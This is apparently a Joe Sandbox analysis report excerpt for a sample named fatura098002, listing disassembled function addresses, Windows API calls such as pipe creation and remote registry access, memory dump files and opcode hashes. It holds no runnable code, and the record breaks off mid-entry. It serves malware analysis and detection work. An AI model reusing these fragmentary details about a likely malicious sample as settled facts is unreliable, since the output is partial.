Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 393eefed977f07443e1da7fd0f0839726d6be4a1ac14c9049cb77de0d6e13f04
Instruction ID: 08b1348864056007d19c232c1d54f191e9ffc4479ebf9d4d99c8d90572391ade
Opcode Fuzzy Hash: 393eefed977f07443e1da7fd0f0839726d6be4a1ac14c9049cb77de0d6e13f04
Instruction Fuzzy Hash: 1D218071500305EBDF208F29DC48EAA7BA4BF447A4F208A19F8A5D62E0D7749961CFA0

Function 007705A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007705C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00770601

Strings

nul, xrefs: 00770639

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: cf9a7c2043555fa2313a3f5afc306594ce3ae1e146afdf7260f1724c46454160
Instruction ID: ac21eb5a40579afe1ddfcee62530e6b7bf31fe43ab2b60646ece80bd767b2e7b
Opcode Fuzzy Hash: cf9a7c2043555fa2313a3f5afc306594ce3ae1e146afdf7260f1724c46454160
Instruction Fuzzy Hash: D821E275500305DBDF208F68CC58A9A77F4BF817A4F208B1AF8A5E32E0D7749861CBA4

Function 007940AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0070600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
Part of subcall function 0070600E: GetStockObject.GDI32(00000011), ref: 00706060
Part of subcall function 0070600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00794112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0079411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0079412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00794139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00794145

Strings

Msctls_Progress32, xrefs: 007940E3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 31c1d960b0f7fe293cb14e9f6f54f6910cebc974319be4a96ccd02b248e8f6f1
Instruction ID: 071d2feac6439bcdefa54fb2b79bb614369b080eded4cb0fd1a915324d38f903
Opcode Fuzzy Hash: 31c1d960b0f7fe293cb14e9f6f54f6910cebc974319be4a96ccd02b248e8f6f1
Instruction Fuzzy Hash: 8611B6B214011DBEEF119F64CC85EE77F9DEF08798F004111B618A2050C6769C21DBA4

Function 0073D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0073D7A3: _free.LIBCMT ref: 0073D7CC

_free.LIBCMT ref: 0073D82D

Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0

_free.LIBCMT ref: 0073D838
_free.LIBCMT ref: 0073D843
_free.LIBCMT ref: 0073D897
_free.LIBCMT ref: 0073D8A2
_free.LIBCMT ref: 0073D8AD
_free.LIBCMT ref: 0073D8B8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: fc3db54e2e92da4916d785b2e6e36beaa2d6b9f440e9d37746bb7a850f88d83e
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 95111F71940B14EAF531BFB0EC4BFCB7BDC6F04700F404825B699A65A3DB69B9064A50

Function 0076DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0076DA74
LoadStringW.USER32(00000000), ref: 0076DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0076DA91
LoadStringW.USER32(00000000), ref: 0076DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0076DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0076DAB9

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 69addeb2120887efefea288a6b628b731506ca1e4bbf5d25079a6f7a538bba93
Instruction ID: 4ee65b4c91f294eaa2fecd41a5e0bdc6a2314772055f65702d922af6b517344e
Opcode Fuzzy Hash: 69addeb2120887efefea288a6b628b731506ca1e4bbf5d25079a6f7a538bba93
Instruction Fuzzy Hash: 490112F69442087FEB11DBE49D89EE7776CE708701F408496B746E2041E6789E854F78

Function 0077096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00F9E330,00F9E330), ref: 0077097B
RtlEnterCriticalSection.NTDLL(00F9E310), ref: 0077098D
TerminateThread.KERNEL32(00F995E0,000001F6), ref: 0077099B
WaitForSingleObject.KERNEL32(00F995E0,000003E8), ref: 007709A9
CloseHandle.KERNEL32(00F995E0), ref: 007709B8
InterlockedExchange.KERNEL32(00F9E330,000001F6), ref: 007709C8
RtlLeaveCriticalSection.NTDLL(00F9E310), ref: 007709CF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 70873c22a785b7e3d114070329d23f6d0f946579c7b0f2ae0b42efc19a0c7d56
Instruction ID: b46d8ffbe5f5d5b51bdd15562164278458cc08353932c754805ac2f44cd519fa
Opcode Fuzzy Hash: 70873c22a785b7e3d114070329d23f6d0f946579c7b0f2ae0b42efc19a0c7d56
Instruction Fuzzy Hash: 1FF0CD31442A12EBDF525BA4EE8DAD67A25BF05742F805016F201508A1C779A476CFA4

Function 007301B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 007300BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007300D6
__allrem.LIBCMT ref: 007300ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0073010B
__allrem.LIBCMT ref: 00730122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00730140

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: bc37ed5ac64abc873799aa5e7834fe34111d83f61bb2db554f5433dce257f6c4
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 9F810676A0071AEBF724AE28DC55B6F73F8AF41724F24413AF551D6682E778D9008790

Function 007361FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007282D9,007282D9,?,?,?,0073644F,00000001,00000001,8BE85006), ref: 00736258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0073644F,00000001,00000001,8BE85006,?,?,?), ref: 007362DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007363D8
__freea.LIBCMT ref: 007363E5

Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444), ref: 00733852

__freea.LIBCMT ref: 007363EE
__freea.LIBCMT ref: 00736413

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 90b84c0a9d980d9d241e895d4ca23acb296a52b3b6842c400f5e3f8fb42a724f
Instruction ID: d9c8d0e5bf1051d087a67660d5a8bdae5570f6c3b319a5135b9124d3c1324dd0
Opcode Fuzzy Hash: 90b84c0a9d980d9d241e895d4ca23acb296a52b3b6842c400f5e3f8fb42a724f
Instruction Fuzzy Hash: F651B172A00216BBFB258F64DC85EBF77A9EB44750F158629FD05D6142EB3CDC50C6A0

Function 0078BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078BD25
RegCloseKey.ADVAPI32(00000000), ref: 0078BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0078BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0078BDF3
RegCloseKey.ADVAPI32(?), ref: 0078BDFF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 72b98078e864cdd5074ef5d6565fe2d3d8e5d02cc68e861c7a79e6026bd92817
Instruction ID: 6d18fa8932a413a3be7c7e7d94228a518c1b610c877ba96e9c62181508782ecc
Opcode Fuzzy Hash: 72b98078e864cdd5074ef5d6565fe2d3d8e5d02cc68e861c7a79e6026bd92817
Instruction Fuzzy Hash: 5281B230208241EFD714EF24C895E6ABBE5FF84308F14855DF5598B2A2DB39ED45CBA2

Function 0075F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0075F7B9
SysAllocString.OLEAUT32(00000001), ref: 0075F860
VariantCopy.OLEAUT32(0075FA64,00000000), ref: 0075F889
VariantClear.OLEAUT32(0075FA64), ref: 0075F8AD
VariantCopy.OLEAUT32(0075FA64,00000000), ref: 0075F8B1
VariantClear.OLEAUT32(?), ref: 0075F8BB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 8f07cae89606d20c212d7deece19003d5920bff5cd25fff6a34e0006f3cdb7e7
Instruction ID: 5565539649abc9bf2d22ad0ebf0d18e5d4d20376a0cbb10e26fa8dac9c3d50f1
Opcode Fuzzy Hash: 8f07cae89606d20c212d7deece19003d5920bff5cd25fff6a34e0006f3cdb7e7
Instruction Fuzzy Hash: CE51E831601310FACF10AB65D899BA9B3E8EF45312F248467ED45DF2D1DBB8AC84C796

Function 0071920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

BeginPaint.USER32(?,?,?), ref: 00719241
GetWindowRect.USER32(?,?), ref: 007192A5
ScreenToClient.USER32(?,?), ref: 007192C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007192D3
EndPaint.USER32(?,?,?,?,?), ref: 00719321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007571EA

Part of subcall function 00719339: BeginPath.GDI32(00000000), ref: 00719357

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 4d84b3d2424dd0e1a8f5cb0bbf734697505f38fae1cd51f47c924cfdb2110b6e
Instruction ID: 56df12ed9ca4c82dd0d65376ca06ceda6a834c079c1fd467784d0a523645438b
Opcode Fuzzy Hash: 4d84b3d2424dd0e1a8f5cb0bbf734697505f38fae1cd51f47c924cfdb2110b6e
Instruction Fuzzy Hash: 2641B370105240EFD711DF58DCA4FF67BB8EB45321F14422AFAA4871E1C7789886DB65

Function 007707EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0077080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00770847
RtlEnterCriticalSection.NTDLL(?), ref: 00770863
RtlLeaveCriticalSection.NTDLL(?), ref: 007708DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007708F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00770921

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: f4c4a246e151e6cbd47d3e6238618d63e517918fa87da35601ad7f4bfc99c81f
Instruction ID: bb4bdd6a8a173c97b234023063f12c580b4aef09ad7ede118cfdea3672f8fc90
Opcode Fuzzy Hash: f4c4a246e151e6cbd47d3e6238618d63e517918fa87da35601ad7f4bfc99c81f
Instruction Fuzzy Hash: 1B415C71A00205EFDF15EF54DC85AAA77B8FF04310F1480A9ED049A297D738EE65DBA4

Function 007981DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0075F3AB,00000000,?,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0079824C
EnableWindow.USER32(00000000,00000000), ref: 00798272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 007982D1
ShowWindow.USER32(00000000,00000004), ref: 007982E5
EnableWindow.USER32(00000000,00000001), ref: 0079830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0079832F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 89d1396c738004f2dd45a62f3f7ca55878cd1836bbb76e5f52ce8fba50bc6805
Instruction ID: 407f7fea6b35387b86a355555ce0b670fb6ba5e37e71631ef82267d6e3b88e55
Opcode Fuzzy Hash: 89d1396c738004f2dd45a62f3f7ca55878cd1836bbb76e5f52ce8fba50bc6805
Instruction Fuzzy Hash: 65419434601644AFDF51CF15E899BE87BF0FB0B714F5881AAE5084B262CB39A841CB56

Function 00764C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00764C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00764CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00764CEA
_wcslen.LIBCMT ref: 00764D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00764D10
_wcsstr.LIBVCRUNTIME ref: 00764D1A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 8767bfc386a15202f05f8c4eb7214bfe3b3bb858641430c385f4786af43e246e
Instruction ID: 97454028e098968245f55b230efc7516e7fd3b821eb3ba67cc52241c2cee1987
Opcode Fuzzy Hash: 8767bfc386a15202f05f8c4eb7214bfe3b3bb858641430c385f4786af43e246e
Instruction Fuzzy Hash: 2121F332704210BBEB265B39EC49E7B7BACDF45750F10806AFD06CA192EB69DC4196A0

Function 0077581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

